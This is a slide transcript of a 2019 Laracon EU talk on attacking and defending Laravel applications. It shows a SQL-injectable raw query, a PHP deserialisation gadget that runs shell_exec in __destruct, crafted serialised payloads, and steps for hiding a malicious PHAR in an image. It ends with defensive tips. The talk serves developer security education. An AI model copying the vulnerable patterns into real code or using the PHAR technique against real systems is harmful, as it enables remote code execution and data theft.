How Your Laravel Application Can Get Hacked?

Transcript

1. How your Laravel application can
   get hacked, and how to prevent
   that from happening?
   Antti Rössi
   Laracon EU - Amsterdam 2019
   

   View Slide

2. whoami
   Antti Rössi
   Helsinki, Finland
   CTO, Partner @ Jobilla Oy
   During daytime I’m building a digital
   software product.
   During night-time I hack software in
   order to make it more secure.
   (CTFs, pentesting, bug bounties,
   reversing…)
   @anamus_
   

   View Slide

3. Faith of our users is
   in our hands
   (as developers and admins)
   @anamus_
   

   View Slide

4. Hack yourself first
   (before someone else does)
   @anamus_
   

   View Slide

5. View Slide

6. !! Disclaimer !!
   All material and examples in this talk are for educational use only.
   The term ‘hacking’ in this presentation refers to ‘ethical hacking’ and should not be confused
   with ‘black hat hacking’, meaning attacking or attempting to attack any application, systems or
   network unauthorized.
   Hacking or attempting to hack anything you don’t own is by default illegal.
   Doing so will eventually get you in jail. Please act responsibly.
   I as the author is this presentation, nor any author of the tools used in this presentation shall
   not be responsible for any individual performing illegal actions with the tools or methods used
   in this presentation.
   The intent of this presentation and of all the demonstrations involved, is to help professional
   software developers to write more secure software.
   @anamus_
   

   View Slide

7. Where can I practise
   this then?
   @anamus_
   

   View Slide

8. Download the
   examples
   (Link to Github in my Twitter, @anamus_)
   @anamus_
   

   View Slide

9. @anamus_
   

   View Slide

10. SQL Injection
    (there’s also a NoSQL injection…)
    @anamus_
    

    View Slide

11. SQL Injection
    Attacker injects malicious
    SQL queries into an HTTP
    request.
    @anamus_
    

    View Slide

12. SQL Injection
    Can lead to a full
    disclosure of the DB
    content when successful.
    @anamus_
    

    View Slide

13. DB::"raw("select * from users order by
    $order desc");
    @anamus_
    

    View Slide

14. SQL Injection
    Certain edge cases can be
    very hard to spot in code
    reviews.
    @anamus_
    

    View Slide

15. SQL Injection
    Easy to test & exploit
    with proper tooling.
    @anamus_
    

    View Slide

16. Round 1
    Fight!
    @anamus_
    

    View Slide

17. Object
    Injection
    (from PHAR Deserialisation to Remote Code Execution)
    @anamus_
    

    View Slide

18. Quick
    theory lesson first
    @anamus_
    

    View Slide

19. Stream Wrappers in PHP
    file:// — Accessing local
    filesystem
    http:// — Accessing HTTP(s) URLs
    ftp:// — Accessing FTP(s) URLs
    php:// — Accessing various I/O
    streams
    zlib:// — Compression Streams
    data:// — Data (RFC 2397)
    glob:// — Find pathnames matching
    pattern
    phar:// — PHP Archive
    ssh2:// — Secure Shell 2
    rar:// — RAR
    ogg:// — Audio streams
    expect:// — Process Interaction
    Streams
    @anamus_
    

    View Slide

20. Stream Wrappers in PHP
    file:// — Accessing local
    filesystem
    http:// — Accessing HTTP(s) URLs
    ftp:// — Accessing FTP(s) URLs
    php:// — Accessing various I/O
    streams
    zlib:// — Compression Streams
    data:// — Data (RFC 2397)
    glob:// — Find pathnames matching
    pattern
    phar:// — PHP Archive
    ssh2:// — Secure Shell 2
    rar:// — RAR
    ogg:// — Audio streams
    expect:// — Process Interaction
    Streams
    @anamus_
    

    View Slide

21. PHAR Files
    @anamus_
    

    View Slide

22. Complete PHP application in a
    single file bundle.
    @anamus_
    

    View Slide

23. phar:// allows reading
    PHP files from a PHAR bundle.
    @anamus_
    

    View Slide

24. Object Serialization
    In PHP
    @anamus_
    

    View Slide

25. Object ->" String ->" Object
    @anamus_
    

    View Slide

26. Example
    @anamus_
    

    View Slide

27. class Logger
    {
    public $file = 'log.txt';
    public $data = 'testing';
    public function __construct()
    {
    // ...
    }
    public function switchContext()
    {
    // ...
    }
    }
    @anamus_
    

    View Slide

28. $logger = new Logger();
    print serialize($logger);
    @anamus_
    

    View Slide

29. O:6:"Logger":2:{s:4:"file";s:
    7:"log.txt";s:4:"data";s:7:"testing";}
    @anamus_
    

    View Slide

30. O:6:"Logger":2:{s:4:"file";s:
    7:"log.txt";s:4:"data";s:7:"testing";}
    CLASS NAME
    @anamus_
    

    View Slide

31. O:6:"Logger":2:{s:4:"file";s:
    7:"log.txt";s:4:"data";s:7:"testing";}
    CLASS PROPERTIES
    (names, lengths, contents)
    @anamus_
    

    View Slide

32. No methods are
    included.
    (good move security wise…)
    @anamus_
    

    View Slide

33. Deserialised objects are
    automatically injected into the
    current application’s scope.
    @anamus_
    

    View Slide

34. Here comes the catch #1
    @anamus_
    

    View Slide

35. There are 2 magic methods that
    get called automatically.
    @anamus_
    

    View Slide

36. public function __wakeup()
    {
    // called upon deserialisation
    }
    public function __destruct()
    {
    // called before garbage collection
    }
    @anamus_
    

    View Slide

37. public $arg = 'id';
    public function __destruct()
    {
    shell_exec($this->%arg);
    }
    @anamus_
    

    View Slide

38. O:6:"Logger":1:{s:3:"arg";s:2:"id";}
    @anamus_
    

    View Slide

39. O:6:"Logger":1:{s:3:"arg";s:2:"id";}
    @anamus_
    

    View Slide

40. O:6:"Logger":1:{s:3:"arg";s:3:"h4x";}
    @anamus_
    

    View Slide

41. public function __destruct()
    {
    shell_exec(“h4x");
    }
    @anamus_
    

    View Slide

42. This is a so called
    ‘Gadget’
    @anamus_
    

    View Slide

43. Here’s the
    catch #2
    @anamus_
    

    View Slide

44. PHAR files can
    contain metadata in
    a serialised format
    @anamus_
    

    View Slide

45. Any file operation on
    the archive will cause
    the meta data to be
    deserialised
    @anamus_
    

    View Slide

46. copy file_exists file_get_contents
    file_put_contents file fileatime filectime
    filegroup fileinode filemtime fileowner
    fileperms filesize filetype fopen is_dir
    is_executable is_file is_link is_readable
    is_writable lstat mkdir parse_ini_file
    readfile rename rmdir stat touch unlink
    @anamus_
    

    View Slide

47. copy file_exists file_get_contents
    file_put_contents file fileatime filectime
    filegroup fileinode filemtime fileowner
    fileperms filesize filetype fopen is_dir
    is_executable is_file is_link is_readable
    is_writable lstat mkdir parse_ini_file
    readfile rename rmdir stat touch unlink
    @anamus_
    

    View Slide

48. Catch #3
    @anamus_
    

    View Slide

49. phar:// stream wrapper
    doesn’t discriminate
    between different filetypes
    @anamus_
    

    View Slide

50. 1. Take an image file
    2. Hide malicious PHAR file in it
    3. Call filesize() on it with phar://
    4. Object from PHAR metadata gets
    injected in application runtime
    5. Gadget kicks in on __destruct()
    @anamus_
    

    View Slide

51. Round 2
    Fight!
    @anamus_
    

    View Slide

52. Privilege
    Escalation
    @anamus_
    

    View Slide

53. Privilege Escalation
    Exploiting a bug, design
    flaw, or configuration
    flaw…
    @anamus_
    

    View Slide

54. Privilege Escalation
    …to access resources
    otherwise unreachable
    to us.
    @anamus_
    

    View Slide

55. Privilege Escalation
    Eg. find a process that’s
    running as root, and
    exploit that.
    @anamus_
    

    View Slide

56. Privilege Escalation
    Hijack the process
    execution flow, but
    don’t crash it.
    @anamus_
    

    View Slide

57. Privilege Escalation
    Very few things should
    ever run as root on the
    host machine.
    @anamus_
    

    View Slide

58. Privilege Escalation
    Artisan scheduler is
    certainly not one of
    these things.
    @anamus_
    

    View Slide

59. Round 3
    Fight!
    @anamus_
    

    View Slide

60. How to
    not get hacked?
    @anamus_
    

    View Slide

61. Tip #1
    Do not trust user input of
    any format.
    Validate everything.
    Sanitise everything.
    @anamus_
    

    View Slide

62. Tip #2
    Do not run outdated software
    in production.
    @anamus_
    

    View Slide

63. Tip #3
    Do not run code that you don’t
    understand in production.
    Eg. copy-pasting code from online
    tutorials.
    @anamus_
    

    View Slide

64. Tip #4
    Follow the principle of least
    privilege.
    Both in your application, and on
    your production host.
    @anamus_
    

    View Slide

65. Tip #5
    Learn to think like a hacker.
    And preferably the basics of
    hacking.
    @anamus_
    

    View Slide

66. Closing Words
    @anamus_
    

    View Slide

67. Security is not a one-
    time effort that you can
    tick off your to-do list.
    @anamus_
    

    View Slide

68. It’s an infinite ongoing
    process, and requires you to pay
    attention to it every single day
    you write or run code.
    @anamus_
    

    View Slide

69. –Uncle Ben, Spiderman
    “With great power comes
    great responsibility.”
    @anamus_
    

    View Slide

70. Thanks!
    Twitter: anamus_
    @anamus_
    

    View Slide

71. Related Links & Materials
    @anamus_
    •https://github.com/ambionics/phpggc
    •https://blog.ripstech.com/2018/new-php-exploitation-technique/
    •https://www.ixiacom.com/company/blog/exploiting-php-phar-
    deserialization-vulnerabilities-part-1
    •https://www.youtube.com/watch?v=GePBmsNJw6Y
    •Hack The Box - CronOS
    

    View Slide